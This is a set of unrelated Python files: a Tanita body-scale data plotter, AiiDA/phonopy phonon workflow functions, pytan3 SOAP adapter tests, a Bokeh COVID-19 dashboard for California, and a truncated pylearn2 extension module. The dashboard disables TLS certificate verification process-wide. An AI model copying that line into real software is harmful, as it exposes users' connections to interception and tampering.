# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import (
absolute_import, division, print_function, unicode_literals)
import argparse
from datetime import datetime
import os
import re
from io import BytesIO
import matplotlib
matplotlib.use('Agg') # requied to work in virtualenv
import matplotlib.pyplot as plt
# Matches one measurement line exported by the Tanita BC-601 scale: each
# field is a two-letter tag followed by its value (DT date, Ti time, Bt
# body type, GE gender, ..., ww water). Named groups capture every metric.
# NOTE(review): all captured group values are *strings*; callers must
# convert to int/float/datetime themselves.
line_regex = re.compile(  # pylint: disable=invalid-name
    r'DT,"(?P<date>[0-9/]+)",Ti,"(?P<time>[0-9:]+)",Bt,(?P<body_type>[02]),GE,'
    r'(?P<gender>[12]),AG,(?P<age>\d+),Hm,(?P<height>\d+\.\d),AL,'
    r'(?P<activity>[123]),Wk,(?P<weight>\d+\.\d),MI,(?P<bmi>\d+\.\d),FW,'
    r'(?P<fat>\d+\.\d),Fr,(?P<fat_rarm>\d+\.\d),Fl,(?P<fat_larm>\d+\.\d),FR,'
    r'(?P<fat_rleg>\d+\.\d),FL,(?P<fat_lleg>\d+\.\d),FT,'
    r'(?P<fat_trunk>\d+\.\d),mW,(?P<muscle>\d+\.\d),mr,'
    r'(?P<muscle_rarm>\d+\.\d),ml,(?P<muscle_larm>\d+\.\d),mR,'
    r'(?P<muscle_rleg>\d+\.\d),mL,(?P<muscle_lleg>\d+\.\d),mT,'
    r'(?P<muscle_trunk>\d+\.\d),bW,(?P<bones>\d+\.\d),IF,(?P<visceral>\d+),rD,'
    r'(?P<calories>\d+),rA,(?P<meta_age>\d+),ww,(?P<water>\d+\.\d)')
def get_args():
    """Parse and return the command-line arguments."""
    parser = argparse.ArgumentParser(
        description='Process data from Tanita BC-601 Body Composition '
                    'Monitor.')
    parser.add_argument('path', help="path to the input file")
    parser.add_argument(
        '-o', '--output', default="tanita_report.pdf", help="output file")
    return parser.parse_args()
def parse_line(line):
    """Parse one export line from the scale into a dict of values.

    Returns the regex group dict with:
      * 'date' and 'time' merged into a datetime under 'date_time',
      * 'body_type' decoded to 'standard'/'athletic',
      * 'gender' decoded to 'male'/'female'.
    All other values stay as the strings captured by ``line_regex``.

    Raises AttributeError when the line does not match ``line_regex``.
    """
    vals = line_regex.search(line).groupdict()
    vals['date_time'] = datetime.strptime(
        '{} {}'.format(vals.pop('date'), vals.pop('time')),
        "%d/%m/%Y %H:%M:%S")
    # groupdict() yields *strings*, so compare against '0'/'1', not the
    # integers 0/1 — the old int comparisons were always False, labelling
    # every record 'athletic' and 'female'.
    vals['body_type'] = 'standard' if vals['body_type'] == '0' else 'athletic'
    vals['gender'] = 'male' if vals['gender'] == '1' else 'female'
    return vals
def plot_dates_graph(dates, data):
    """Plot each series in *data* against *dates* and return PNG bytes.

    *data* is a sequence of dicts with 'values' and 'label' keys. The
    current matplotlib figure is cleared before returning the BytesIO
    buffer (rewound to position 0).
    """
    plt.xticks(rotation=90)
    for series in data:
        plt.plot_date(dates, series['values'], 'o-', label=series['label'])
    plt.legend(loc='upper center', ncol=3, bbox_to_anchor=(0.5, 1.05))
    plt.tight_layout()
    buffer_ = BytesIO()
    plt.savefig(buffer_, format='png')
    buffer_.seek(0)  # rewind so callers can read from the start
    plt.clf()
    return buffer_
def _write_png(filename, png_stream):
    """Write an in-memory PNG stream to *filename*."""
    # PNG data is binary: open with 'wb' (text mode corrupts the bytes and
    # raises TypeError on Python 3), and use a context manager so the file
    # handle is always closed — the old code leaked an unclosed text-mode
    # handle.
    with open(filename, 'wb') as png_file:
        png_file.write(png_stream.read())


def main():
    """Read a Tanita export file and render fat/muscle graphs to PNG."""
    args = get_args()
    if not os.path.isfile(args.path):
        raise IOError("File '{}' does not exist.".format(args.path))
    # One dict of values per measurement line.
    with open(args.path) as f_input:
        parsed = [parse_line(line) for line in f_input]
    # Pivot per-measurement dicts into one list per metric.
    collected = {}
    for measure in parsed:
        for key, value in measure.items():
            collected.setdefault(key, []).append(value)
    dates = matplotlib.dates.date2num(collected['date_time'])
    fat_png = plot_dates_graph(dates, [
        {'values': collected['fat'], 'label': 'Total'},
        {'values': collected['fat_larm'], 'label': 'Left arm'},
        {'values': collected['fat_rarm'], 'label': 'Right arm'},
        {'values': collected['fat_lleg'], 'label': 'Left leg'},
        {'values': collected['fat_rleg'], 'label': 'Right leg'},
        {'values': collected['fat_trunk'], 'label': 'Trunk'},
    ])
    _write_png('fat.png', fat_png)
    muscle_png = plot_dates_graph(dates, [
        {'values': collected['muscle'], 'label': 'Total'},
        {'values': collected['muscle_larm'], 'label': 'Left arm'},
        {'values': collected['muscle_rarm'], 'label': 'Right arm'},
        {'values': collected['muscle_lleg'], 'label': 'Left leg'},
        {'values': collected['muscle_rleg'], 'label': 'Right leg'},
        {'values': collected['muscle_trunk'], 'label': 'Trunk'},
    ])
    _write_png('muscle.png', muscle_png)


if __name__ == '__main__':
    main()
|
import numpy as np
from aiida.engine import calcfunction
from aiida.plugins import DataFactory
from phonopy.structure.atoms import PhonopyAtoms
from aiida.orm import Bool, Str, Int, load_node
@calcfunction
def get_phonon_setting_info(phonon_settings,
                            structure,
                            symmetry_tolerance,
                            displacement_dataset=None):
    """Normalize phonopy settings and generate displaced supercells.

    Parameters
    ----------
    phonon_settings : Dict
        Must contain 'supercell_matrix' (3 values or a 3x3 integer
        matrix); 'mesh' and 'distance' are optional and defaulted below.
    structure : StructureData
        Unit cell used to build the phonopy instance.
    symmetry_tolerance : Float
        symprec passed to phonopy.
    displacement_dataset : Dict, optional
        Pre-computed displacement dataset; when None, displacements are
        generated with the configured distance.

    Returns a dict of output nodes: 'phonon_setting_info',
    'supercell_%03d' for each displaced supercell, 'supercell', and
    'primitive'.
    """
    return_vals = {}
    ph_settings = {}
    ph_settings.update(phonon_settings.get_dict())
    dim = ph_settings['supercell_matrix']
    # Accept either a 3-vector (diagonal supercell) or a full 3x3 matrix.
    if len(np.ravel(dim)) == 3:
        smat = np.diag(dim)
    else:
        smat = np.array(dim)
    if not np.issubdtype(smat.dtype, np.integer):
        raise TypeError("supercell_matrix is not integer matrix.")
    else:
        ph_settings['supercell_matrix'] = smat.tolist()
    # Defaults: 100.0 is a mesh-density spec, 0.01 the displacement
    # distance — presumably Angstrom; TODO confirm units against phonopy.
    if 'mesh' not in ph_settings:
        ph_settings['mesh'] = 100.0
    if 'distance' not in ph_settings:
        ph_settings['distance'] = 0.01
    tolerance = symmetry_tolerance.value
    ph_settings['symmetry_tolerance'] = tolerance
    ph = get_phonopy_instance(structure, ph_settings, {})
    # Record what phonopy actually determined (primitive matrix, space
    # group) so downstream steps reuse identical settings.
    ph_settings['primitive_matrix'] = ph.primitive_matrix
    ph_settings['symmetry'] = {
        'number': ph.symmetry.dataset['number'],
        'international': ph.symmetry.dataset['international']}
    if displacement_dataset is None:
        ph.generate_displacements(distance=ph_settings['distance'])
    else:
        ph.dataset = displacement_dataset.get_dict()
    ph_settings['displacement_dataset'] = ph.dataset
    settings = DataFactory('dict')(dict=ph_settings)
    settings.label = 'phonon_setting_info'
    return_vals['phonon_setting_info'] = settings
    # Supercells and primitive cell
    for i, scell in enumerate(ph.supercells_with_displacements):
        structure = phonopy_atoms_to_structure(scell)
        label = "supercell_%03d" % (i + 1)
        structure.label = "%s %s" % (
            structure.get_formula(mode='hill_compact'), label)
        return_vals[label] = structure
    supercell_structure = phonopy_atoms_to_structure(ph.supercell)
    supercell_structure.label = "%s %s" % (
        supercell_structure.get_formula(mode='hill_compact'), 'supercell')
    return_vals['supercell'] = supercell_structure
    primitive_structure = phonopy_atoms_to_structure(ph.primitive)
    primitive_structure.label = "%s %s" % (
        primitive_structure.get_formula(mode='hill_compact'), 'primitive cell')
    return_vals['primitive'] = primitive_structure
    return return_vals
@calcfunction
def check_imported_supercell_structure(supercell_ref,
                                       supercell_calc,
                                       symmetry_tolerance):
    """Check that an imported supercell matches the reference supercell.

    Compares lattice vectors and site positions within the symmetry
    tolerance and returns a Bool node (labelled "True"/"False").
    """
    def _verdict(ok):
        flag = Bool(ok)
        flag.label = str(ok)
        return flag

    symprec = symmetry_tolerance.value
    lattice_diff = np.subtract(supercell_ref.cell, supercell_calc.cell)
    if np.any(np.abs(lattice_diff) > symprec):
        return _verdict(False)
    ref_positions = [site.position for site in supercell_ref.sites]
    calc_positions = [site.position for site in supercell_calc.sites]
    delta = np.subtract(ref_positions, calc_positions)
    # Wrap to the nearest periodic image before measuring distances.
    # NOTE(review): this treats site.position as fractional coordinates
    # (it is dotted with the cell below) — confirm against the caller.
    delta -= np.rint(delta)
    distances = np.sqrt(np.sum(np.dot(delta, supercell_ref.cell) ** 2, axis=1))
    if np.any(distances > symprec):
        return _verdict(False)
    return _verdict(True)
@calcfunction
def get_force_sets(**forces_dict):
    """Collect per-supercell forces (and optional energies) into one node.

    Expects keys 'forces_%03d' (ArrayData with array 'final') and
    optionally 'misc_%03d' carrying total energies. Returns an ArrayData
    with arrays 'force_sets' and, when available, 'energies'.
    """
    forces = []
    energies = []
    for index in range(1, len(forces_dict) + 1):
        force_key = "forces_%03d" % index
        if force_key in forces_dict:
            forces.append(forces_dict[force_key].get_array('final'))
        misc_key = "misc_%03d" % index
        if misc_key in forces_dict:
            energies.append(
                forces_dict[misc_key]['total_energies']['energy_no_entropy'])
    # Every supplied forces_* input must have been consumed.
    assert len(forces) == sum(1 for key in forces_dict if 'forces' in key)
    force_sets = DataFactory('array')()
    force_sets.set_array('force_sets', np.array(forces))
    if energies:
        force_sets.set_array('energies', np.array(energies))
    force_sets.label = 'force_sets'
    return force_sets
@calcfunction
def get_nac_params(born_charges, epsilon, nac_structure, **params):
    """Symmetrize Born charges and dielectric tensor for the primitive cell.

    Born effective charges and dielectric constants computed inside the
    phonopy workchain already refer to the primitive cell, but data
    brought in via the immigrant may belong to a unit cell. In that case
    ``symmetrize_borns_and_epsilon`` maps the values onto the target
    primitive cell, which requires the cell the values were calculated in
    and the target primitive cell.

    Optional keyword parameters:
        primitive : StructureData, target primitive cell.
        symmetry_tolerance : Float, symprec passed to phonopy.
    """
    from phonopy.structure.symmetry import symmetrize_borns_and_epsilon
    sym_kwargs = {}
    if 'symmetry_tolerance' in params:
        sym_kwargs['symprec'] = params['symmetry_tolerance'].value
    if 'primitive' in params:
        sym_kwargs['primitive'] = phonopy_atoms_from_structure(
            params['primitive'])
    sym_borns, sym_epsilon = symmetrize_borns_and_epsilon(
        born_charges.get_array('born_charges'),
        epsilon.get_array('epsilon'),
        phonopy_atoms_from_structure(nac_structure),
        **sym_kwargs)
    nac_params = DataFactory('array')()
    nac_params.set_array('born_charges', sym_borns)
    nac_params.set_array('epsilon', sym_epsilon)
    nac_params.label = 'born_charges & epsilon'
    return nac_params
@calcfunction
def get_force_constants(structure, phonon_settings, force_sets):
    """Produce force constants from the displacement dataset and forces.

    Returns an ArrayData with arrays 'force_constants' and 'p2s_map'
    (primitive-to-supercell index map).
    """
    phonon = get_phonopy_instance(structure, phonon_settings, {})
    phonon.dataset = phonon_settings['displacement_dataset']
    phonon.forces = force_sets.get_array('force_sets')
    phonon.produce_force_constants()
    fc_node = DataFactory('array')()
    fc_node.set_array('force_constants', phonon.force_constants)
    fc_node.set_array('p2s_map', phonon.primitive.p2s_map)
    fc_node.label = 'force_constants'
    return fc_node
@calcfunction
def get_phonon(structure, phonon_settings, force_constants, **params):
    """Run mesh, DOS, thermal-property and band-structure calculations.

    Returns a dict with 'dos', 'pdos', 'thermal_properties' and
    'band_structure' output nodes.
    """
    settings = phonon_settings.get_dict()
    ph = get_phonopy_instance(structure, settings, params)
    ph.force_constants = force_constants.get_array('force_constants')
    # Mesh-based properties first, then the band structure.
    total_dos, pdos, thermal_properties = get_mesh_property_data(
        ph, settings['mesh'])
    return {
        'dos': total_dos,
        'pdos': pdos,
        'thermal_properties': thermal_properties,
        'band_structure': get_bands_data(ph),
    }
@calcfunction
def get_data_from_node_id(node_id):
    """Extract structure plus forces or NAC data from an existing node.

    Returns {'born_charges', 'dielectrics', 'structure'} for an NAC
    calculation, or {'forces', 'structure'} for a force calculation.

    Raises RuntimeError when the node has no input structure or carries
    neither forces nor NAC outputs.
    """
    calc = load_node(node_id.value)
    if 'structure' not in calc.inputs:
        raise RuntimeError("Crystal structure could not be found.")
    # Round-trip through PhonopyAtoms so the returned structure is a fresh
    # node rather than the original input node.
    structure = phonopy_atoms_to_structure(
        phonopy_atoms_from_structure(calc.inputs.structure))

    def _array_node(array_name, values, label):
        node = DataFactory('array')()
        node.set_array(array_name, values)
        node.label = label
        return node

    outputs = calc.outputs
    if 'born_charges' in outputs and 'dielectrics' in outputs:
        born = _array_node(
            'born_charges',
            outputs.born_charges.get_array('born_charges'),
            'born_charges')
        epsilon = _array_node(
            'epsilon', outputs.dielectrics.get_array('epsilon'), 'epsilon')
        return {'born_charges': born, 'dielectrics': epsilon,
                'structure': structure}
    if 'forces' in outputs:
        forces = _array_node(
            'final', outputs.forces.get_array('final'), 'forces')
        return {'forces': forces, 'structure': structure}
    raise RuntimeError("Forces or NAC params were not found.")
def get_mesh_property_data(ph, mesh):
    """Compute total DOS, projected DOS and thermal properties on a mesh.

    Returns (total_dos, projected_dos, thermal_properties) nodes.
    """
    # Symmetrized mesh run for total DOS and thermal properties.
    ph.set_mesh(mesh)
    ph.run_total_dos()
    total = get_total_dos(ph.get_total_dos_dict())
    ph.run_thermal_properties()
    thermal = get_thermal_properties(ph.get_thermal_properties_dict())
    # Projected DOS needs eigenvectors on the full (unsymmetrized) mesh.
    ph.set_mesh(mesh, is_eigenvectors=True, is_mesh_symmetry=False)
    ph.run_projected_dos()
    projected = get_projected_dos(ph.get_projected_dos_dict())
    return total, projected, thermal
def get_total_dos(total_dos):
    """Wrap a phonopy total-DOS dict in an AiiDA XyData node."""
    xy_node = DataFactory('array.xy')()
    xy_node.set_x(total_dos['frequency_points'], 'Frequency', 'THz')
    xy_node.set_y(total_dos['total_dos'], 'Total DOS', '1/THz')
    xy_node.label = 'Total DOS'
    return xy_node
def get_projected_dos(projected_dos):
    """Wrap a phonopy projected-DOS dict in an AiiDA XyData node.

    One y-series is stored per projection channel.
    """
    xy_node = DataFactory('array.xy')()
    channels = list(projected_dos['projected_dos'])
    xy_node.set_x(projected_dos['frequency_points'], 'Frequency', 'THz')
    xy_node.set_y(channels,
                  ['Projected DOS'] * len(channels),
                  ['1/THz'] * len(channels))
    xy_node.label = 'Projected DOS'
    return xy_node
def get_thermal_properties(thermal_properties):
    """Wrap a phonopy thermal-properties dict in an AiiDA XyData node."""
    xy_node = DataFactory('array.xy')()
    xy_node.set_x(thermal_properties['temperatures'], 'Temperature', 'K')
    series = [thermal_properties['free_energy'],
              thermal_properties['entropy'],
              thermal_properties['heat_capacity']]
    xy_node.set_y(series,
                  ['Helmholtz free energy', 'Entropy', 'Cv'],
                  ['kJ/mol', 'J/K/mol', 'J/K/mol'])
    xy_node.label = 'Thermal properties'
    return xy_node
def get_bands_data(ph):
    """Build a BandsData node from phonopy's automatic band structure."""
    ph.auto_band_structure()
    cleaned_labels = []
    for raw in ph.band_structure.labels:
        text = raw
        # Strip LaTeX decorations (e.g. $\mathrm{...}$) from the labels.
        for token in ('$', '\\', 'mathrm{', '}'):
            text = text.replace(token, '')
        cleaned_labels.append(text.upper())
    spg = ph.symmetry.dataset
    return get_bands(ph.band_structure.qpoints,
                     ph.band_structure.frequencies,
                     cleaned_labels,
                     ph.band_structure.path_connections,
                     label="%s (%d)" % (spg['international'], spg['number']))
def get_bands(qpoints, frequencies, labels, path_connections, label=None):
    """Assemble band-path segments into a single BandsData node.

    Parameters
    ----------
    qpoints, frequencies : sequences of per-segment arrays.
    labels : high-symmetry point labels, one per path vertex.
    path_connections : booleans; True when a segment connects directly to
        the next one (shared end point), False at a path break.
    label : optional label for the resulting BandsData node.

    Segments are concatenated; at connected joints the shared q-point is
    kept only once, and label positions are recorded as
    (index_into_concatenated_list, text) pairs.
    """
    qpoints_list = list(qpoints[0])
    frequencies_list = list(frequencies[0])
    labels_list = [(0, labels[0]), ]
    label_index = 1
    for pc, qs, fs in zip(path_connections[:-1], qpoints[1:], frequencies[1:]):
        # Special case: a connected joint at GAMMA gets the label attached
        # to both the last point of the previous segment and the first
        # point of the next one.
        if labels[label_index] == 'GAMMA' and pc:
            labels_list.append((len(qpoints_list) - 1, labels[label_index]))
            if label_index < len(labels):
                labels_list.append((len(qpoints_list), labels[label_index]))
            label_index += 1
            qpoints_list += list(qs)
            frequencies_list += list(fs)
        elif pc:
            # Connected joint: drop the duplicated first point of the
            # incoming segment.
            labels_list.append((len(qpoints_list) - 1, labels[label_index]))
            label_index += 1
            qpoints_list += list(qs[1:])
            frequencies_list += list(fs[1:])
        else:
            # Path break: close the previous segment and, if another label
            # exists, open the next one at the following index.
            labels_list.append((len(qpoints_list) - 1, labels[label_index]))
            label_index += 1
            if label_index < len(labels):
                labels_list.append((len(qpoints_list), labels[label_index]))
                label_index += 1
            qpoints_list += list(qs)
            frequencies_list += list(fs)
    # Terminal label of the whole path.
    labels_list.append((len(qpoints_list) - 1, labels[-1]))
    bs = DataFactory('array.bands')()
    bs.set_kpoints(np.array(qpoints_list))
    bs.set_bands(np.array(frequencies_list), units='THz')
    bs.labels = labels_list
    if label is not None:
        bs.label = label
    return bs
def get_phonopy_instance(structure, phonon_settings_dict, params):
    """Create a Phonopy object, optionally attaching NAC parameters.

    When params contains 'nac_params' (ArrayData with 'born_charges' and
    'epsilon'), the non-analytical term correction is enabled using the
    VASP conversion factor.
    """
    from phonopy import Phonopy
    phonon = Phonopy(
        phonopy_atoms_from_structure(structure),
        phonon_settings_dict['supercell_matrix'],
        primitive_matrix='auto',
        symprec=phonon_settings_dict['symmetry_tolerance'])
    if 'nac_params' in params:
        from phonopy.interface import get_default_physical_units
        nac_data = params['nac_params']
        factor = get_default_physical_units('vasp')['nac_factor']
        phonon.set_nac_params({
            'born': nac_data.get_array('born_charges'),
            'dielectric': nac_data.get_array('epsilon'),
            'factor': factor,
        })
    return phonon
def get_primitive(structure, ph_settings):
    """Return the primitive cell of *structure* as a StructureData node."""
    from phonopy import Phonopy
    settings = ph_settings.get_dict()
    phonon = Phonopy(
        phonopy_atoms_from_structure(structure),
        supercell_matrix=settings['supercell_matrix'],
        primitive_matrix=settings['primitive_matrix'],
        symprec=settings['symmetry_tolerance'])
    primitive = phonon.get_primitive()
    primitive_structure = DataFactory('structure')(cell=primitive.get_cell())
    for symbol, position in zip(primitive.get_chemical_symbols(),
                                primitive.get_positions()):
        primitive_structure.append_atom(position=position, symbols=symbol)
    return {'primitive_structure': primitive_structure}
def phonopy_atoms_to_structure(cell):
    """Convert a PhonopyAtoms cell into an AiiDA StructureData node."""
    structure = DataFactory('structure')(cell=cell.get_cell())
    for symbol, position in zip(cell.get_chemical_symbols(),
                                cell.get_positions()):
        structure.append_atom(position=position, symbols=symbol)
    return structure
def phonopy_atoms_from_structure(structure):
    """Convert an AiiDA StructureData node into a PhonopyAtoms cell."""
    kind_names = [site.kind_name for site in structure.sites]
    coordinates = [site.position for site in structure.sites]
    return PhonopyAtoms(symbols=kind_names,
                        positions=coordinates,
                        cell=structure.cell)
def from_node_id_to_aiida_node_id(node_id):
    """Wrap a raw node identifier in the matching AiiDA data type.

    Parameters
    ----------
    node_id : int or str
        A node PK (int) or a UUID/label (str).

    Returns Int or Str. Raises RuntimeError for any other type, including
    bool, which is never a valid node identifier.
    """
    # isinstance is the idiomatic type check; bool is rejected explicitly
    # because isinstance(True, int) is True, whereas the previous
    # ``type(...) is int`` check excluded booleans.
    if isinstance(node_id, bool):
        raise RuntimeError("%s is not supported in load_node."
                           % type(node_id))
    if isinstance(node_id, int):
        return Int(node_id)
    if isinstance(node_id, str):
        return Str(node_id)
    raise RuntimeError("%s is not supported in load_node."
                       % type(node_id))
|
<reponame>lifehackjim/pytan3<filename>pytan3/tests/test_adapters/test_adapters_all_soap.py
# -*- coding: utf-8 -*-
"""Test suite for pytan3."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import pytan3
import pytest
class TestAdaptersAllSoap(object):
    """Test all Adapters of type: soap."""
    @pytest.fixture
    def adapter(self, adapter_soap, http_client, auth):
        """Get an adapter object of type: soap."""
        api_module = adapter_soap["api_module"]
        api_client_cls = adapter_soap["api_client"]
        adapter_cls = adapter_soap["adapter"]
        api_objects = pytan3.api_objects.ApiObjects(
            module_file=api_module["module_file"]
        )
        try:
            credentials_auth = pytan3.auth_methods.Credentials(
                http_client=http_client, **auth
            )
            api_client = api_client_cls(
                http_client=http_client, auth_method=credentials_auth
            )
            adapter = adapter_cls(api_client=api_client, api_objects=api_objects)
        # NOTE(review): other references in this class use
        # pytan3.adapters.exceptions; confirm pytan3.api.exceptions is the
        # right home of VersionMismatchError.
        except pytan3.api.exceptions.VersionMismatchError as exc: # pragma: no cover
            m = "Skipping due to version requirement failure: {e}".format(e=exc)
            pytest.skip(m)
        return adapter
    # only SOAP has session returned
    def test_missing_session_warns(self, adapter, monkeypatch):
        """Test warn thrown when session element isn't found."""
        # Break the session-matching regex so the session tag is never found.
        monkeypatch.setattr("pytan3.adapters.re_soap_tag", "x")
        user = adapter.api_objects.User(id=adapter.api_client.auth_method.uid)
        with pytest.warns(pytan3.adapters.exceptions.SessionNotFoundWarning):
            result = adapter.api_get(user)
        user = result()
        assert isinstance(result, pytan3.results.Soap)
        assert isinstance(user, adapter.api_objects.User)
        assert user.id == adapter.api_client.auth_method.uid
        assert user.name
    # only SOAP allows None for target
    def test_get_audit_logs_user_target_none(self, adapter):
        """Test type=user, target=None returns audit logs for all users."""
        result = adapter.api_get_audit_logs(type="user", target=None)
        logs = result()
        assert isinstance(result, pytan3.results.Soap)
        assert isinstance(logs, adapter.api_objects.AuditLog)
        assert isinstance(logs.entries, adapter.api_objects.AuditDataList)
        assert isinstance(logs.entries[0], adapter.api_objects.AuditData)
        assert len(logs.entries) > 1
    # SOAP and REST disagree on how audit logs should be returned. fun.
    def test_get_audit_logs_user_target(self, adapter):
        """Test type=user, target=auth_method.uid returns 1 audit log for 1 user."""
        target = adapter.api_client.auth_method.uid
        result = adapter.api_get_audit_logs(type="user", target=target)
        logs = result()
        assert isinstance(result, pytan3.results.Soap)
        assert isinstance(logs, adapter.api_objects.AuditLog)
        assert isinstance(logs.entries, adapter.api_objects.AuditDataList)
        assert isinstance(logs.entries[0], adapter.api_objects.AuditData)
        assert len(logs.entries) == 1
    def test_get_audit_logs_user_target_count2(self, adapter):
        """Test type=user, target=auth_method.uid, count=2 returns 2 audit log for 1 user."""
        target = adapter.api_client.auth_method.uid
        result = adapter.api_get_audit_logs(type="user", target=target, count=2)
        logs = result()
        assert isinstance(result, pytan3.results.Soap)
        assert isinstance(logs, adapter.api_objects.AuditLog)
        assert isinstance(logs.entries, adapter.api_objects.AuditDataList)
        assert isinstance(logs.entries[0], adapter.api_objects.AuditData)
        assert len(logs.entries) == 2
    def test_get_q_missing_attrs(self, adapter):
        """Test api_get w/ question with no attrs set works."""
        result = adapter.api_get(adapter.api_objects.Question())
        obj = result()
        assert isinstance(result, pytan3.results.Soap)
        assert isinstance(obj, adapter.api_objects.QuestionList)
    def test_bad_command(self, adapter):
        """Test exc thrown with cmd mismatch."""
        # NOTE(review): other tests read adapter.api_client.auth_method;
        # confirm adapter.auth_method is a valid shortcut for the same
        # object.
        result = adapter.api_get(adapter.api_objects.User(id=adapter.auth_method.uid))
        obj = result.request_body_obj
        path = "soap:Envelope/soap:Body/t:tanium_soap_request"
        src = "SOAP API deserialized request body"
        request = result.get_dict_path(obj=obj, path=path, src=src)
        # Corrupt the command so the response no longer matches the request.
        request["command"] = "badwolf"
        with pytest.raises(pytan3.results.exceptions.ResponseError):
            result()
|
<reponame>2133649586/Coronavirus-Tracker<gh_stars>0
import ssl
# Disable TLS certificate verification globally so the raw-GitHub CSV
# downloads below succeed even behind broken certificate chains.
# NOTE(review): this weakens security for every HTTPS request in the
# process — confirm this is acceptable.
ssl._create_default_https_context = ssl._create_unverified_context
import pandas as pd
from bokeh.core.properties import value
from bokeh.layouts import column, row
from bokeh.models import CustomJS, DatePicker, Div, ColumnDataSource, TableColumn, DataTable, HoverTool
from bokeh.plotting import figure, curdoc
# LA Times "datadesk" mirrors of California Department of Public Health data.
total_path = "https://raw.githubusercontent.com/datadesk/california-coronavirus-data/master/cdph-state-totals.csv"
race_path = "https://raw.githubusercontent.com/datadesk/california-coronavirus-data/master/cdph-race-ethnicity.csv"
total_data = pd.read_csv(total_path)
race_data = pd.read_csv(race_path)
# Rows are newest-first, so row 0 carries the most recent date.
last_update_date = total_data["date"][0]
# to represent the source of data
introduce_of_data = Div(text = """all of the data we used in this visualization project is published by the California \
Department of Public Health, and we get the dataset with url from github repository : https://github.com/datadesk/california-coronavirus-data.
<b>Last update date: {}<b>""".format(last_update_date), width = 700, height= 80 )
# design date select options
date_picker = DatePicker(title='Select date', value="2020-08-11", min_date="2020-06-25", max_date=last_update_date)
selected_date = date_picker.value
# question a: daily increase = today's cumulative count minus yesterday's
# (rows are newest-first, so row i+1 is the previous day).
# NOTE(review): if the selected date is absent, "confirm case" stays empty
# while "date" has one entry — column lengths then differ; confirm bokeh
# tolerates this.
increase_case = {"date":[selected_date],"confirm case":[]}
for i in range(len(total_data["date"])-1):
    if total_data["date"][i] == selected_date:
        increase_case["confirm case"].append(total_data["confirmed_cases"][i] - total_data["confirmed_cases"][i+1])
source_q1 = ColumnDataSource(increase_case)
columns1 = [TableColumn(field="date", title="Date"),TableColumn(field="confirm case", title="Increase confirm case")]
data_table1 = DataTable(source = source_q1, columns=columns1, width=400, height=120)
#question b,c
description = Div(text = """we can get answer of second and third question here, 2.For a particular day, what is the %percent cases by race compared to their representation in the
general population? 3.For a particular day, what is the %percent deaths by race compared to their representation in the
general population? And when you move mouse to certain area, the detail of parameter will displayed in right box. <b>Attention: if there is no any data in table or figure
, that means the search date is not exist in our data<b>""")
# Restrict to the all-ages rows for the selected day.
some = race_data[(race_data["age"]=="all") & (race_data["date"]==selected_date)]
particular_column = ["date","race","confirmed_cases_percent","deaths_percent","population_percent"]
particular_data = some[particular_column]
source_q23 = ColumnDataSource(data = particular_data)
columns23 = [TableColumn(field="date", title="Date"),TableColumn(field="race", title="Race"),
             TableColumn(field="confirmed_cases_percent", title="Confirmed cases percent")
    ,TableColumn(field="deaths_percent", title="Deaths percent"),TableColumn(field="population_percent", title="Population percent")]
data_table23 = DataTable(source = source_q23, columns=columns23, width=800, height=280)
# Build the stacked bar chart: one stacked layer per percentage column.
colors = ["#c9d9d3", "#718dbf", "#e84d60"]
para_column = ["confirmed_cases_percent","deaths_percent","population_percent"]
p = figure(x_range=particular_data["race"], plot_height=350, title="",tools="")
# NOTE(review): bokeh >= 1.4 renamed the ``legend`` kwarg to
# ``legend_label``/``legend_field`` — confirm the pinned bokeh version
# still accepts ``legend=``.
renderers = p.vbar_stack(para_column, # stacker column names: one stacked layer per entry
                  x='race', # category column for the x axis
                  source=source_q23, # shared data source (also drives the table above)
                  width=0.9, color=colors,
                  legend=[value(x) for x in para_column], name=para_column) # one legend entry per stacked column
# Draw the stacked chart: the first argument must be the stacker names,
# in the same order as the colors.
h = HoverTool(
    tooltips=[('confirmed cases percent %', '@confirmed_cases_percent'), ('deaths cases percent %', '@deaths_percent'), ('population percent %', '@population_percent')])
p.add_tools(h)
p.xgrid.grid_line_color = None
p.axis.minor_tick_line_color = None
p.outline_line_color = None
p.legend.location = "top_left"
p.legend.orientation = "horizontal"
# Remaining styling tweaks.
def call_back(attr, old, new):
    """Refresh both data sources when the user picks a new date.

    Bokeh on_change callback signature: attr/old/new are supplied by the
    widget; the current value is re-read from date_picker directly.
    """
    # question a: daily increase for the newly selected date
    global selected_date
    selected_date = date_picker.value
    daily = {"date": [selected_date], "confirm case": []}
    for idx in range(len(total_data["date"]) - 1):
        if total_data["date"][idx] == selected_date:
            daily["confirm case"].append(
                total_data["confirmed_cases"][idx]
                - total_data["confirmed_cases"][idx + 1])
    source_q1.data = daily
    # questions b, c: per-race percentages for the selected date
    mask = (race_data["age"] == "all") & (race_data["date"] == selected_date)
    wanted = ["date", "race", "confirmed_cases_percent", "deaths_percent",
              "population_percent"]
    source_q23.data = race_data[mask][wanted]
# Re-run the queries whenever the user picks a new date.
date_picker.on_change("value", call_back)
# Assemble the two panels and register them with the Bokeh document.
q1 = column(introduce_of_data,date_picker,data_table1)
q23 = column(description,p)
#show(column(q1,q23))
curdoc().add_root(column(q1,column(data_table23,q23)))
|
<reponame>burgerdev/hostload
"""
Extensions for pylearn2 training algorithms. Those are either reimplemented to
suit the execution model of this package, or new ones for recording metrics.
"""
import os
import cPickle as pkl
import numpy as np
from pylearn2.train_extensions import TrainExtension
from .abcs import Buildable
class BuildableTrainExtension(TrainExtension, Buildable):
    """
    makes a pylearn2 TrainExtension buildable
    """
    @classmethod
    def build(cls, config, parent=None, graph=None, workingdir=None):
        """
        build an instance of this class with given configuration dict
        """
        # Copy so the caller's config dict is not mutated; inject the
        # working directory under the "wd" key unless already present.
        config_copy = config.copy()
        if "wd" not in config_copy:
            config_copy["wd"] = workingdir
        obj = super(BuildableTrainExtension, cls).build(config_copy)
        return obj
    def __init__(self, **kwargs):
        # NOTE(review): build() stores the working directory under the key
        # "wd", but this constructor looks for "workingdir" — confirm which
        # key Buildable forwards here; as written, self._wd may only be set
        # through Buildable's own config handling.
        if "workingdir" in kwargs:
            self._wd = kwargs["workingdir"]
        super(BuildableTrainExtension, self).__init__()
    @classmethod
    def get_default_config(cls):
        """
        override to provide your own default configuration
        """
        conf = super(BuildableTrainExtension, cls).get_default_config()
        conf["wd"] = None
        return conf
class PersistentTrainExtension(BuildableTrainExtension):
    """
